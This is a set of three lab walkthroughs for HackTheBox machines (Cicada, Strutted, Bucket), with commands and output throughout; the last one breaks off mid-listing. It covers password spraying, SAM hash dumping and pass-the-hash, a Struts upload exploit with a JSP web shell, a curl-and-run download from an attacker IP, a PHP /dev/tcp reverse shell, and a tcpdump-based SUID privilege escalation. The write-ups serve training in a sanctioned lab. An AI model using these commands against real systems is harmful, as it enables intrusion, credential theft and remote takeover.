HackTheBox – Cicada Writeup

app.hackthebox.com

This is the Writeup of HackTheBox “Cicada”.

User Flag

Perform a port scan.

$ nmap -Pn -sVC -T4 -A -p- 10.10.11.35 -oN nmap_result
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-27 13:49:52Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
63178/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s
| smb2-time: 
|   date: 2025-01-27T13:50:45
|_  start_date: N/A

You now know the operational status of the port.

Enumerate the SMB share names.
,.DEVHR

$ smbclient -L //cicada.htb
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DEV             Disk      
        HR              Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share

HRI found a connection to theNotice from HR.txt

$ smbclient //cicada.htb/HR 
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 08:29:09 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 13:31:48 2024

                4168447 blocks of size 4096. 412399 blocks available

Notice from HR.txtWhen I downloaded it and checked the contents, I found that the default password was the one.Cicada$M6Corpb*@Lp#nZp!8

Notice from HR.txt

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

Now that you know the password, list the account names that can use this password.
Brute force the RID to find the account.

$ nxc smb 10.10.11.35 -u 'test' -p '' --rid-brute
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\test: (Guest)
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

I have created a file with a list of accounts that I found.

smb-users.txt

Administrator
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

Identify accounts that can use the default password in a password spraying attack.

$ nxc smb 10.10.11.35 -u smb-users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'          
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

michael.wrightsonseems to be using the default password.
Use the resulting credentials to enumerate the accounts in the domain.

$ nxc smb 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.10.11.35     445    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-  
SMB         10.10.11.35     445    CICADA-DC        Administrator                 2024-08-26 20:08:03 1       Built-in account for administering the computer/domain               
SMB         10.10.11.35     445    CICADA-DC        Guest                         2024-08-28 17:26:56 0       Built-in account for guest access to the computer/domain             
SMB         10.10.11.35     445    CICADA-DC        krbtgt                        2024-03-14 11:14:10 0       Key Distribution Center Service Account                              
SMB         10.10.11.35     445    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 1        
SMB         10.10.11.35     445    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 1        
SMB         10.10.11.35     445    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0        
SMB         10.10.11.35     445    CICADA-DC        david.orelious                2024-03-14 12:17:29 0       Just in case I forget my password is aRt$Lp#7t*VQ!3                  
SMB         10.10.11.35     445    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 0        
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated 8 local users: CICADA

david.oreliousI found the password for the account.
When you enumerate the shared resources again in the account, you can see that they are now readable even though they were previously inaccessible.Descriptiondavid.oreliousDEV

$ nxc smb 10.10.11.35 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV             READ            
SMB         10.10.11.35     445    CICADA-DC        HR              READ            
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.10.11.35     445    CICADA-DC        SYSVOL          READ            Logon server share

/DEVConnect to and check the directory and find it.Backup_script.ps1

$ smbclient //cicada.htb/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 08:31:39 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 13:28:22 2024

                4168447 blocks of size 4096. 420260 blocks available

Backup_script.ps1When I downloaded and confirmed the process, I found out that the password is the same.emily.oscarsQ!3@Lp#M6b*7t*Vt

Backup_script.ps1

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

emily.oscarsWhen you enumerate shared resources in your account, you can read them, and you can read and write them.
I found that I had more permissions than other accounts.ADMIN$C$

$ nxc smb 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' --shares
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt 
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$          READ            Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$              READ,WRITE      Default share
SMB         10.10.11.35     445    CICADA-DC        DEV
SMB         10.10.11.35     445    CICADA-DC        HR              READ            
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.10.11.35     445    CICADA-DC        SYSVOL          READ            Logon server share

emily.oscarsI was able to connect to the remote desktop with .

$ evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                                   
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>

C:\Users\emily.oscars.CICADA\Desktop\user.txtI was able to get the user flag from.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> more user.txt
850e88885d9cc255bd699fe0e1372612

Root Flag

emily.oscarsCheck the permissions.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

SeBackupPrivilege, so it seems that you can elevate your privileges from there.SeRestorePrivilege

https://qiita.com/embed-contents/link-card#qiita-embed-content__e9e55146ce09a5b0e2e94dd0ebfcca0c

C:\TempCreate and move folders.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir C:\


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         8/22/2024  11:45 AM                PerfLogs
d-r---         8/29/2024  12:32 PM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-----         3/14/2024   5:21 AM                Shares
d-r---         8/26/2024   1:11 PM                Users
d-----         9/23/2024   9:35 AM                Windows


*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd c:\
*Evil-WinRM* PS C:\> mkdir Temp


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         2/20/2025   4:49 AM                Temp


*Evil-WinRM* PS C:\> cd Temp

Save the value of the registry.samsystem

*Evil-WinRM* PS C:\Temp> reg save hklm\sam c:\Temp\sam
The operation completed successfully.

*Evil-WinRM* PS C:\Temp> reg save hklm\system c:\Temp\system
The operation completed successfully.

Download the two saved files.

*Evil-WinRM* PS C:\Temp> download sam
                                        
Info: Downloading C:\Temp\sam to sam
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Temp> download system
                                        
Info: Downloading C:\Temp\system to system
                                        
Info: Download successful!

Hash values from two files were obtained.Administrator

$ impacket-secretsdump -sam sam -system system LOCAL 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

The remote connection was successful with a hash value.

$ evil-winrm -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341' -i 10.10.11.35
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                                   
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator

C:\Users\Administrator\Desktop\root.txtI was able to get the root flag from.

*Evil-WinRM* PS C:\Users\Administrator\Documents> more ..\Desktop\root.txt
4e844fb08f08b23900d88a4def5e1ae4

HackTheBox – Strutted Writeup

Hack The Box

app.hackthebox.com

This is a writeup of HackTheBox “Strutted”.

User Flag

Perform a port scan.

$ nmap -Pn -sCV -A -T4 -p- 10.10.11.59 -oN nmap_result
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://strutted.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

You now know the operational status of the port.

port	service	version
22	ssh	OpenSSH 8.9p1
80	http	nginx 1.18.0

Now that I know the domain, I will add it./etc/hosts

10.10.11.59     strutted.htb

http://strutted.htb/Go to.

I was able to download the source code of the website from the top right.Download

pom.xmlIt turns out that it is used as a framework.Apache struts 6.3.0.1

https://qiita.com/embed-contents/link-card#qiita-embed-content__2f5ee634bf49fee0032a274ba505e328

strutted/pom.xml

(省略)

<properties>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    <maven.compiler.source>17</maven.compiler.source>
    <maven.compiler.target>17</maven.compiler.target>
    <struts2.version>6.3.0.1</struts2.version>
    <jetty-plugin.version>9.4.46.v20220331</jetty-plugin.version>
    <maven.javadoc.skip>true</maven.javadoc.skip>
    <jackson.version>2.14.1</jackson.version>
    <jackson-data-bind.version>2.14.1</jackson-data-bind.version>
</properties>

apache struts cve 2024I found an RCE vulnerability.CVE-2024-53677

The vulnerability appears to allow arbitrary files to be uploaded to arbitrary directories via path traversal.
As a result, it seems that it can be connected to RCE by uploading a malicious JSP file.

https://qiita.com/embed-contents/link-card#qiita-embed-content__be689304e990a5d9d95dc0f159ef6cbc

https://qiita.com/embed-contents/link-card#qiita-embed-content__d710160141716896dbf741c69b711888

When I checked the code for the file upload function、,, I found that file extensions are allowed.jpegpnggif

/strutted/src/main/java/org/strutted/htb/Upload.java

private boolean isAllowedContentType(String contentType) {
    String[] allowedTypes = {"image/jpeg", "image/png", "image/gif"};
    for (String allowedType : allowedTypes) {
        if (allowedType.equalsIgnoreCase(contentType)) {
            return true;
        }
    }
    return false;
}

Look at the process of determining the extension.
Upload limit is based on the magic number of the file.

/strutted/src/main/java/org/strutted/htb/Upload.java

private boolean isImageByMagicBytes(File file) {
    byte[] header = new byte[8];
    try (InputStream in = new FileInputStream(file)) {
        int bytesRead = in.read(header, 0, 8);
        if (bytesRead < 8) {
            return false;
        }

        // JPEG
        if (header[0] == (byte)0xFF && header[1] == (byte)0xD8 && header[2] == (byte)0xFF) {
            return true;
        }

        // PNG
        if (header[0] == (byte)0x89 && header[1] == (byte)0x50 && header[2] == (byte)0x4E && header[3] == (byte)0x47) {
            return true;
        }

        // GIF (GIF87a or GIF89a)
        if (header[0] == (byte)0x47 && header[1] == (byte)0x49 && header[2] == (byte)0x46 &&
            header[3] == (byte)0x38 && (header[4] == (byte)0x37 || header[4] == (byte)0x39) && header[5] == (byte)0x61) {
            return true;
        }

I created a test jpeg file with a magic number and successfully uploaded the file.

$ print '\xFF\xD8\xFF' > test.jpeg      
                                                                                                       
┌──(kali㉿kali)-[~/Strutted]
└─$ echo 'hello' >> test.jpeg

Looking at various PoCs, it seems that JSP code can be inserted after the magic number.
The JSP shellcode used the following.

https://qiita.com/embed-contents/link-card#qiita-embed-content__8ac7615b6a912ffb98108f4ac7bcd80d

An excerpt of the Body of the POST request is as follows.


(省略)

-----------------------------270809347519694441851360887477
Content-Disposition: form-data; name="Upload"; filename="test.jpeg"
Content-Type: image/jpeg

ÿØÿ
<%@ page import="java.io.*, java.util.*, java.net.*" %>
<%

(省略)

%>
-----------------------------270809347519694441851360887477
Content-Disposition: form-data; name="top.UploadFileName"

../../revshell.jsp
-----------------------------270809347519694441851360887477--

It should be noted that do not add and in the middle boundary.
If you attach this, path traversal will fail.name="Upload"name="top.UploadFileName"--

If the upload is successful, you can see from the response that the file was uploaded to .uploads/20250408_144513/../../revshell.jsp

revshell.jsp?action=cmd&cmd=lsRCE is successful when you send a request like this.

Execute the following commands in order to create a reverse shell.

cmd=curl http://10.10.14.136:8000/shell.sh -o /tmp/shell.sh
chmod +x /tmp/shell.sh
bash /tmp/shell.sh

I was able to get the shell of tomcat.

$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.136] from (UNKNOWN) [10.10.11.59] 56452
bash: cannot set terminal process group (1052): Inappropriate ioctl for device
bash: no job control in this shell
tomcat@strutted:~$ whoami
whoami
tomcat

Set the TTY.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

If you look at the Tomcat account authentication file, you will see a password string.tomcat-users.xml

/etc/tomcat9/tomcat-users.xml


(省略)

<!--
  <user username="admin" password="<must-be-changed>" roles="manager-gui"/>
  <user username="robot" password="<must-be-changed>" roles="manager-script"/>
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="admin" password="IT14d6SSP81k" roles="manager-gui,admin-gui"/>
--->

(省略)

SSH connection was successful with the obtained password.

$ ssh james@strutted.htb

/home/james/user.txtI was able to get the user flag from.

$ cat user.txt
129b84a2a8e0925db69c37fe9c51ae0b

Root Flag

sudo -lCheck with the settings./usr/sbin/tcpdump

$ sudo -l
Matching Defaults entries for james on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User james may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/sbin/tcpdump

I found privilege escalation in GTFOBins.

https://qiita.com/embed-contents/link-card#qiita-embed-content__5ff8aeda14f36ede118e5111f95bccb7

I was able to do it as described and set SUID in bash.

-bash-5.1$ COMMAND='chmod u+s /bin/bash'
-bash-5.1$ TF=$(mktemp)
-bash-5.1$ echo "$COMMAND" > $TF
-bash-5.1$ chmod +x $TF
-bash-5.1$ sudo /usr/sbin/tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 262144 bytes
Maximum file limit reached: 1
1 packet captured
4 packets received by filter
0 packets dropped by kernel
-bash-5.1$ whoami
james
-bash-5.1$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1396520 Mar 14  2024 /bin/bash

I was able to elevate to root privileges using bash’s SUID.

-bash-5.1$ /bin/bash -p
bash-5.1# whoami
root

/root/root.txtI was able to get the root flag from.

bash-5.1# cat /root/root.txt
39fb83665a3ce29520d7807a9363bad5

Hack The Box – Bucket Writeup

Hack The Box

app.hackthebox.com

This is the Writeup of HackTheBox “Bucket”.

User Flag

Perform a port scan.

$ nmap -Pn -sCV -A -T4 -p- 10.10.10.212 -oN nmap_result
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://bucket.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)

You now know the operational status of the port.

port	service	version
22	ssh	OpenSSH 8.2p1
80	http	Apache/2.4.41

Now that I know the domain name, I will add it./etc/hosts

10.10.10.212    bucket.htb

Go to the website.

I found a domain called from the source code of the page.
You have added a subdomain to your account.s3.bucket.htb/etc/hosts

It seems that the image is brought from AWS S3, so I will add the AWS CLI to investigate.

First, install the AWS CLI.

$ sudo apt install -y awscli

Since valid authentication information is not available, it is set appropriately.

$ aws configure
AWS Access Key ID [None]: test
AWS Secret Access Key [None]: test
Default region name [None]: test
Default output format [None]: test

aws s3 lsallows you to view the inside of the bucket and optionally specify a destination.--endpoint-url

https://qiita.com/embed-contents/link-card#qiita-embed-content__b9e2a66e7fcc0888bbd33db7881e345f

When I ran the command, I found out that it was the bucket name.adserver

$ aws s3 ls --endpoint-url=http://s3.bucket.htb
2025-04-06 04:13:02 adserver

adserverI was able to check the image files in the bucket.

$ aws s3 ls s3://adserver --endpoint-url=http://s3.bucket.htb 
                           PRE images/
2025-04-06 04:19:01       5344 index.html

Download the file in the bucket.

$ aws --endpoint-url=http://s3.bucket.htb s3 sync s3://adserver .

index.htmlConfirm.

From the fact that it matches the website on the target machine, we can infer that Apache is pulling files from this S3 bucket and moving them.

To confirm this hypothesis, copy an appropriate PHP file to an S3 bucket.

$ aws --endpoint-url=http://s3.bucket.htb s3 cp test.php s3://adserver
upload: ./test.php to s3://adserver/test.php

/test.phpWhen you access the PHP file, the PHP file you uploaded is running.

このことから、PHPのリバースシェルファイルをアップロードすればリバースシェルがとれそうです。

Create a PHP file for the reverse shell.

shell.php

<?php exec('bash -c "bash -i >& /dev/tcp/10.10.14.79/1234 0>&1"');?>

Upload the PHP file you created to S3.

$ aws --endpoint-url=http://s3.bucket.htb s3 cp shell.php s3://adserver

Listen on Netcat.

$ nc -lnvp 1234

http://bucket.htb/shell.phpI was able to put up a reverse shell when I accessed it.

$ nc -lnvp 1234          
listening on [any] 1234 ...
connect to [10.10.14.79] from (UNKNOWN) [10.10.10.212] 41760
bash: cannot set terminal process group (1054): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bucket:/var/www/html$ whoami
whoami
www-data

Set the TTY.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

royIt looks like you need to elevate to your account.

$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root root 4096 Sep 16  2020 .
drwxr-xr-x 21 root root 4096 Feb 10  2021 ..
drwxr-xr-x  5 roy  roy  4096 Apr  6 01:25 roy

/home/roy/I found a folder that I can access to.project

$ ls -la /home/roy
ls -la /home/roy
total 56
drwxr-xr-x 5 roy  roy   4096 Apr  6 01:25 .
drwxr-xr-x 3 root root  4096 Sep 16  2020 ..
drwxrwxr-x 2 roy  roy   4096 Apr  4 20:14 .aws
lrwxrwxrwx 1 roy  roy      9 Sep 16  2020 .bash_history -> /dev/null
-rw-r--r-- 1 roy  roy    220 Sep 16  2020 .bash_logout
